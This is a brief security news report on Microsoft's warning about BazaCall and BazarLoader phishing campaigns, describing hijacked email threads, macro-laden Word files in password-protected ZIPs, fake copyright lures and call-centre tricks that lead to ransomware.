Microsoft warns of new BazaCall malware campaign
The campaign uses fake copyright infringement emails and malicious files disguised as “stolen images”.
The Microsoft Security Intelligence team of cybersecurity experts has announced a new malicious BazaCall campaign.
A recent campaign challenges the best practice of only opening emails from known contacts: it uses compromised accounts to hijack email threads and attach a Word document in a password-protected ZIP file. The doc has a macro that launches MSHTA to download BazarLoader. pic.twitter.com/JmHl3CLm9R
— Microsoft Security Intelligence (@MsftSecIntel) August 10, 2021
“We are monitoring several active email campaigns that use BazarLoader to deliver a wide range of payloads,” Microsoft said in a statement.
The campaign, dubbed Stolen Images, uses fake copyright infringement contact form emails and malicious files that allegedly contain “stolen images.” In this way, scammers try to trick users into downloading malware.
“The recent campaign challenges the best practice of opening emails only from known contacts by using compromised accounts to intercept conversations and attach a Word document in a password-protected ZIP file. The document contains a macro that launches MSHTA to load BazarLoader, ”the experts explained.
Microsoft raised the alarm about BazaCall due to unusual and relatively costly methods that relied on phishing emails claiming expired trial subscriptions and upcoming payments. The emails do not contain links to web pages and instead entice potential victims to contact the call centre, after which the operator provides instructions to install malware under the guise of helping to reverse the fraudulent payment.
The installed backdoor allows BazaCall members to install ransomware on the victim’s device.
Catch up on more articles here
Follow us on Twitter here